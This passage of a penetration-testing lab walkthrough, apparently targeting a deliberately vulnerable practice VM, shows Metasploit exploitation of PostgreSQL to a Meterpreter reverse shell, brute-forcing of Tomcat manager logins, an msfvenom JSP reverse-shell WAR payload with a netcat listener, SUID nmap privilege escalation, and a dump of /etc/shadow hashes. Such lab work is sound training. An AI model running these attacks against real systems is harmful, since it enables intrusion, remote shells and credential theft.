| POSTGRESQL:CVE-2009-3229 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3229
| POSTGRESQL:CVE-2009-0922 4.0 https://vulners.com/postgresql/POSTGRESQL:CVE-2009-0922
| CVE-2021-3677 4.0 https://vulners.com/cve/CVE-2021-3677
| CVE-2021-20229 4.0 https://vulners.com/cve/CVE-2021-20229
| CVE-2017-7548 4.0 https://vulners.com/cve/CVE-2017-7548
| CVE-2017-7547 4.0 https://vulners.com/cve/CVE-2017-7547
| CVE-2014-8161 4.0 https://vulners.com/cve/CVE-2014-8161
| CVE-2014-0066 4.0 https://vulners.com/cve/CVE-2014-0066
| CVE-2014-0060 4.0 https://vulners.com/cve/CVE-2014-0060
| CVE-2012-3489 4.0 https://vulners.com/cve/CVE-2012-3489
| CVE-2012-2655 4.0 https://vulners.com/cve/CVE-2012-2655
| CVE-2009-3229 4.0 https://vulners.com/cve/CVE-2009-3229
| SSV:19322 3.5 https://vulners.com/seebug/SSV:19322 *EXPLOIT*
| PRION:CVE-2010-0733 3.5 https://vulners.com/prion/PRION:CVE-2010-0733
| PACKETSTORM:127092 3.5 https://vulners.com/packetstorm/PACKETSTORM:127092 *EXPLOIT*
| CVE-2021-3393 3.5 https://vulners.com/cve/CVE-2021-3393
| CVE-2010-0733 3.5 https://vulners.com/cve/CVE-2010-0733
|_ CVE-2022-41862 2.6 https://vulners.com/cve/CVE-2022-41862
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.78 secondsLet us exploit it.
msf6 exploit(multi/misc/java_rmi_server) > search postgres
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/server/capture/postgresql normal No Authentication Capture: PostgreSQL
1 post/linux/gather/enum_users_history normal No Linux Gather User History
2 exploit/multi/http/manage_engine_dc_pmp_sqli 2014-06-08 excellent Yes ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
3 exploit/windows/misc/manageengine_eventlog_analyzer_rce 2015-07-11 manual Yes ManageEngine EventLog Analyzer Remote Code Execution
4 auxiliary/admin/http/manageengine_pmp_privesc 2014-11-08 normal Yes ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
5 auxiliary/analyze/crack_databases normal No Password Cracker: Databases
6 exploit/multi/postgres/postgres_copy_from_program_cmd_exec 2019-03-20 excellent Yes PostgreSQL COPY FROM PROGRAM Command Execution
7 exploit/multi/postgres/postgres_createlang 2016-01-01 good Yes PostgreSQL CREATE LANGUAGE Execution
8 auxiliary/scanner/postgres/postgres_dbname_flag_injection normal No PostgreSQL Database Name Command Line Flag Injection
9 auxiliary/scanner/postgres/postgres_login normal No PostgreSQL Login Utility
10 auxiliary/admin/postgres/postgres_readfile normal No PostgreSQL Server Generic Query
11 auxiliary/admin/postgres/postgres_sql normal No PostgreSQL Server Generic Query
12 auxiliary/scanner/postgres/postgres_version normal No PostgreSQL Version Probe
13 exploit/linux/postgres/postgres_payload 2007-06-05 excellent Yes PostgreSQL for Linux Payload Execution
14 exploit/windows/postgres/postgres_payload 2009-04-10 excellent Yes PostgreSQL for Microsoft Windows Payload Execution
15 auxiliary/scanner/postgres/postgres_hashdump normal No Postgres Password Hashdump
16 auxiliary/scanner/postgres/postgres_schemadump normal No Postgres Schema Dump
17 auxiliary/admin/http/rails_devise_pass_reset 2013-01-28 normal No Ruby on Rails Devise Authentication Password Reset
18 exploit/multi/http/rudder_server_sqli_rce 2023-06-16 excellent Yes Rudder Server SQLI Remote Code Execution
19 post/linux/gather/vcenter_secrets_dump 2022-04-15 normal No VMware vCenter Secrets Dump
Interact with a module by name or index. For example info 19, use 19 or use post/linux/gather/vcenter_secrets_dump
msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(linux/postgres/postgres_payload) > run
[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(linux/postgres/postgres_payload) > set LHOST 192.168.204.137
LHOST => 192.168.204.137
msf6 exploit(linux/postgres/postgres_payload) > run
[*] Started reverse TCP handler on 192.168.204.137:4444
[*] 192.168.204.136:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/VaEYRLQK.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.204.136
[*] Meterpreter session 2 opened (192.168.204.137:4444 -> 192.168.204.136:36615) at 2024-04-28 02:10:54 -0400
meterpreter >
Apache Tomcat/Coyote JSP engine 1.1 Exploitation
Run a nmap scan against the target
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 -p 8180 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 00:22 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).
PORT STATE SERVICE VERSION
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags:
| /admin/:
| JSESSIONID:
| httponly flag not set
| /admin/index.html:
| JSESSIONID:
| httponly flag not set
| /admin/login.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin.html:
| JSESSIONID:
| httponly flag not set
| /admin/account.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.html:
| JSESSIONID:
| httponly flag not set
| /admin/home.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.html:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.html:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.html:
| JSESSIONID:
| httponly flag not set
| /admin/cp.html:
| JSESSIONID:
| httponly flag not set
| /admin/index.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/home.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/cp.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/account.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/jscript/upload.html:
| JSESSIONID:
|_ httponly flag not set
| vulners:
| cpe:/a:apache:coyote_http_connector:1.1:
| OSV:BIT-APACHE-2021-31618 7.5 https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
| OSV:CVE-2023-26044 5.3 https://vulners.com/osv/OSV:CVE-2023-26044
| OSV:CVE-2022-36032 5.3 https://vulners.com/osv/OSV:CVE-2022-36032
| PRION:CVE-2023-26044 5.0 https://vulners.com/prion/PRION:CVE-2023-26044
|_ PRION:CVE-2022-36032 5.0 https://vulners.com/prion/PRION:CVE-2022-36032
|_http-server-header: Apache-Coyote/1.1
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.204.136
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.204.136:8180/admin/
| Form id: username
|_ Form action: j_security_check;jsessionid=42FA811BFEB53FD3B608B245C81FF812
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_ /webdav/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:71:62:0D (VMware)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds
if we browse the site, we can view the homepage. The tomcat manager requires a username and password.
We have a brute force module for bruteforcing the login credentials in Metasploit
msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options
Module options (auxiliary/scanner/http/tomcat_mgr_login):
Name Current Setting Required Description
---- --------------- -------- -----------
ANONYMOUS_LOGIN false yes Attempt to login with a blank username and password
BLANK_PASSWORDS false no Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
DB_ALL_CREDS false no Try each user/password couple stored in the current database
DB_ALL_PASS false no Add all passwords in the current database to the list
DB_ALL_USERS false no Add all users in the current database to the list
DB_SKIP_EXISTING none no Skip existing credentials stored in the current database (Accepted: none, user, user&r
ealm)
PASSWORD no The HTTP password to specify for authentication
PASS_FILE /usr/share/metasploit-framework/data/wordlists no File containing passwords, one per line
/tomcat_mgr_default_pass.txt
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
TARGETURI /manager/html yes URI for Manager login. Default is /manager/html
THREADS 1 yes The number of concurrent threads (max one per host)
USERNAME no The HTTP username to specify for authentication
USERPASS_FILE /usr/share/metasploit-framework/data/wordlists no File containing users and passwords separated by space, one pair per line
/tomcat_mgr_default_userpass.txt
USER_AS_PASS false no Try the username as the password for all users
USER_FILE /usr/share/metasploit-framework/data/wordlists no File containing users, one per line
/tomcat_mgr_default_users.txt
VERBOSE true yes Whether to print output for all attempts
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit
Here we can see the cracked password. It is tomcat:tomcat
[-] 192.168.204.136:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.204.136:8180 - Login Successful: tomcat:tomcat
[-] 192.168.204.136:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.204.136:8180 - LOGIN FAILED: both:manager (Incorrect)
And we are able to login to the manager with the found credentials.
If we look closely we have a field for uploading WAR Files. Create a payload.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.204.137 LPORT=4444 -f war >ammar2.warNow upload it.
Open a netcat listener
nc -nlvp 4444 Now browse to the page.
And we have a connection.
Privilege Escalation with SUID Binaries
Find the files with SUID Binaries
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chownWe have got lots of binaries with SUID bit set and I am gonna use nmap here to do the privilege escalation.
nmap --interactive
Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=110(tomcat55) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
Our effective uid is root.
Last updated
